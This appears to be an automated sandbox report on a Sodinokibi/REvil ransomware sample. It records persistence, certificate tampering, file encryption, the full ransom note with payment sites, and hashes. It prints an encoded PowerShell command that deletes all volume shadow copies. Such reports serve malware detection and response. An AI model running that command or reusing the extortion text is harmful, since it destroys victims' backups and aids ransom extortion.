sodinokibi | 3f2198870df4c4d85119f93bbc803d4abc24925e336462168384f285b5855187

Analysis

max time kernel
132s
max time network
155s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
13/10/2023, 02:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

svchost.exe
Size

166KB
MD5

5bab7e6528a56bd5d3a76d01ec3ab45f
SHA1

4b9495fc06c67e4419a0cf3d70b6285e9808afc4
SHA256

1dc818f51827d89a545493921f8648299f3eb367c1e0354969ccaa9df7ce77b5
SHA512

7c59fca6ffa7d1fd55f7c2268c22193d48c4082277f95c882b1e7df93f011a86c036f569c5bb8dc0a83aebe9bf44df9e7f11aac99ea0c33f917e63e80c2b07c4
SSDEEP

3072:EJMawtnGqtWoKeZC62aoNUSncs0whq2aWc54aF:+w9vteQJYUocfWLK

Score

10^/10

sodinokibi persistence ransomware

Malware Config

Extracted

Path

C:\Users\459cz5g750-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 459cz5g750. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FC4123773DEB86BF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FC4123773DEB86BF Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 21XddKsGKo2MEpqgaLCO4gB1IIMbWZh5C4G945DMGcFW8WozdPivhAZF34RCQkKg cvPi5QTytv7ru9vCdHC5IVsFxdHbSfr5VA5DLF40YcRrpZJy8qujN/U6Gt1uMyTG Q6clHF2oSfZpx6ekXHDqAWxLJEd9fU4rIfJKL/z3+x1ZMokc0KKb1WKuUGBJL9Fo Kz5W00OV5pbbxWO6/rGqEZtj8lZSvK4x7KOrnRRSOzJzXA2/XJPnmVBtSgFFkLTC ztzDO0dAOoeh4gTLbNm1xYrwYRljhBnvXv94pEfZQF0I8RPe7ajJdzgZL+n1m420 RRnPF02rpaMJVDsEX9DD8lEBUlujk9kLlMnaMdJxk2WaYODlUFwAaJ9hfCGxMiZ2 FLkbvYeXcAXgZ7mSrHeuzdozX2OMm5e07atA76nIzuhxb+odvS2SKkSXwnVeH275 IqpdNsl5ay9I5EEa+Bn/rrHC6sLuCRkhnLj6pxsMM40SJQ86BA3eAYPeQRXfzs/x we59wY9ZtwinDmW4roBtrVpVIV3g8CrIdHZuM1qzKSTjYr7O1px5GZsuOSeIZCdO II7V5ee6O7yWW6x1DxsdOOesohAemplmcbpQXk1rMEDk+X/WBN3lMAu2DWuCOgdv GKDVkmHNAYs0EoqLKW+C9dRyP93gdCVsIJey19qzRkasN3FkcAN0KRyeP0a2lzSZ L3WJFmE9QKzodr3YJPhWZSGSWiyrR12W/UuNLNuc4hKJBFiIiu77Vt+Y6qR3C9kn 1OB5iCO4qxL56G/b5z6l8iFtea+C1PcuXP2FzbG5AArbjWeTKRgO6J5qE06Cmow8 WjwX+doqST8niwaoxozurPynekchmV4kZZi4LEhi1xz/t/b8ChGntggdsOISS5S7 yd1Fle3HY/QnWeM5M4QAClA71LjkxuG9kHxdEMJbqyKIjUMNITBbb5eQ0ewIfpuN iGuU75ZDAyH7q2e77e72f/0oXOlFATTYxAGddXw3MewNz89R69dPS1IZj84onL+G L8+VgdHex4B93bjJBSlnMdLvWDKVHIuNvPIJf3jOtcK8QHm8iREjJk7oKd6fRdKX U0eqzYi0CqipPSYUqicw9aW1kmejOlQXUsMkuOPwdCCRneomdBecYFGVmkXU9P30 wxbIS0GnQmGhW2DSN1Wl1FLuu+UVsJJ/SwqGBbWnIo2gq8Fz6krmv6qVr6lGcwbL /Te/6vmFRjLqEGS+ZYeI615QmU/U4uI4Vwg0UJetinHvibtDR4xONvFjhPBX5pTo CWtKMU1luf2QiGA56cxK0UCpeCIWzbv6/4ONoFTSSDaP5JyCPZRMlCglvcZmGng6 3ViX32rirePcrBcI1VokqhE3eCqORnO8iHysrAkfPQt9UFcKW4iNuw== Extension name: 459cz5g750 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FC4123773DEB86BF

http://decryptor.cc/FC4123773DEB86BF

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oXnEn2JlQT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe"	svchost.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\D:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	svchost.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zes2a5o771w3d.bmp"	svchost.exe

Drops file in Program Files directory 41 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\ResetHide.doc	svchost.exe
File opened for modification	\??\c:\program files\TraceCompress.xlsx	svchost.exe
File opened for modification	\??\c:\program files\DebugUse.mpeg	svchost.exe
File opened for modification	\??\c:\program files\LockEnter.asx	svchost.exe
File opened for modification	\??\c:\program files\ReadApprove.ps1xml	svchost.exe
File opened for modification	\??\c:\program files\PingMeasure.emf	svchost.exe
File opened for modification	\??\c:\program files\ProtectPush.wma	svchost.exe
File opened for modification	\??\c:\program files\TestDeny.kix	svchost.exe
File opened for modification	\??\c:\program files\WaitRepair.emf	svchost.exe
File opened for modification	\??\c:\program files\CloseSync.doc	svchost.exe
File opened for modification	\??\c:\program files\GetReceive.vsd	svchost.exe
File opened for modification	\??\c:\program files\ImportDisconnect.pcx	svchost.exe
File opened for modification	\??\c:\program files\RepairGroup.inf	svchost.exe
File opened for modification	\??\c:\program files\SkipAdd.3gp	svchost.exe
File opened for modification	\??\c:\program files\UnlockInvoke.001	svchost.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\459cz5g750-readme.txt	svchost.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\459cz5g750-readme.txt	svchost.exe
File opened for modification	\??\c:\program files\InstallProtect.iso	svchost.exe
File opened for modification	\??\c:\program files\LimitTrace.vsw	svchost.exe
File opened for modification	\??\c:\program files\LockRequest.m4v	svchost.exe
File opened for modification	\??\c:\program files\NewAssert.vssm	svchost.exe
File opened for modification	\??\c:\program files\RequestDebug.css	svchost.exe
File opened for modification	\??\c:\program files\UnregisterPublish.m3u	svchost.exe
File opened for modification	\??\c:\program files\WatchMerge.mpv2	svchost.exe
File opened for modification	\??\c:\program files\WriteSend.mp2v	svchost.exe
File opened for modification	\??\c:\program files\DebugConvert.WTV	svchost.exe
File opened for modification	\??\c:\program files\EditStop.temp	svchost.exe
File opened for modification	\??\c:\program files\ExportRepair.csv	svchost.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\459cz5g750-readme.txt	svchost.exe
File created	\??\c:\program files\459cz5g750-readme.txt	svchost.exe
File opened for modification	\??\c:\program files\ClearGrant.jpeg	svchost.exe
File opened for modification	\??\c:\program files\RegisterPop.vssm	svchost.exe
File opened for modification	\??\c:\program files\StartUnprotect.contact	svchost.exe
File opened for modification	\??\c:\program files\CheckpointConnect.vdw	svchost.exe
File opened for modification	\??\c:\program files\GroupInvoke.pps	svchost.exe
File opened for modification	\??\c:\program files\JoinDismount.AAC	svchost.exe
File opened for modification	\??\c:\program files\BlockUnregister.vst	svchost.exe
File opened for modification	\??\c:\program files\TestOpen.xps	svchost.exe
File created	\??\c:\program files (x86)\459cz5g750-readme.txt	svchost.exe
File opened for modification	\??\c:\program files\FormatShow.wpl	svchost.exe
File opened for modification	\??\c:\program files\HideJoin.html	svchost.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000020000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	svchost.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1992	svchost.exe
2428	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1992	svchost.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeBackupPrivilege	2500	vssvc.exe
Token: SeRestorePrivilege	2500	vssvc.exe
Token: SeAuditPrivilege	2500	vssvc.exe
Token: SeTakeOwnershipPrivilege	1992	svchost.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2428	1992	svchost.exe	28
PID 1992 wrote to memory of 2428	1992	svchost.exe	28
PID 1992 wrote to memory of 2428	1992	svchost.exe	28
PID 1992 wrote to memory of 2428	1992	svchost.exe	28

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2088

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\459cz5g750-readme.txt

Filesize
7KB

MD5
c0f0a2d646ac3f7954f3f02cb49b68eb

SHA1
551a75a2b4ccf9611edd23b5cc9d5fcaec945519

SHA256
de1658af1c787f83345f48f5e0e8308a64e0276a3e51cd6c45116d1fb5fd58d6

SHA512
8e5f8c31b10b8acc920693708dd424d36d493c93c61ece0218cdb93d9a48b57e6aed372c7d9305ceab007ff807918976d2cb8cd929fc1a48a6c15a9600acb53b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f8376b3206e4825fda3b6c64d197df90

SHA1
35f310cb4fef178a416ecd020ef79dd515afef65

SHA256
ca7009f55eb05d99bfa6671d618b5980625f9c18441d5d69fa1c772a15b0f2c3

SHA512
a8a30a3044553e7668e25a5d382af758c51bce76e197076f2afa832f1e0a54c1391a3103f034ec6d53d8f6fb91b1076356faa2c269c69dac875c8ad7d84c532a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5BF7.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5C39.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Windows\System32\catroot2\dberr.txt

Filesize
194KB

MD5
c1a3f542b9a98f11d6d42a915d3c5e92

SHA1
97445060d7be3689c6486fad59ce6e4017c8591a

SHA256
6b50695942aa027e808aa84fad9bc6cf87b0e7dad25fa570ca4ecc0a7d2ae991

SHA512
76778adee729a3fe41756b7c9ade32b4f45d873e925ab2fd763b5705cedd532e97d580a1d9f485c208a31f8ded893834152a3dd9d703ff2c9a82e72bf50c1cd3

Download Submit
memory/2428-7-0x0000000002730000-0x00000000027B0000-memory.dmp

Filesize
512KB

Download
memory/2428-10-0x000007FEF44B0000-0x000007FEF4E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-11-0x000007FEF44B0000-0x000007FEF4E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-9-0x0000000002730000-0x00000000027B0000-memory.dmp

Filesize
512KB

Download
memory/2428-8-0x0000000002730000-0x00000000027B0000-memory.dmp

Filesize
512KB

Download
memory/2428-4-0x000000001B410000-0x000000001B6F2000-memory.dmp

Filesize
2.9MB

Download
memory/2428-6-0x000007FEF44B0000-0x000007FEF4E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-5-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download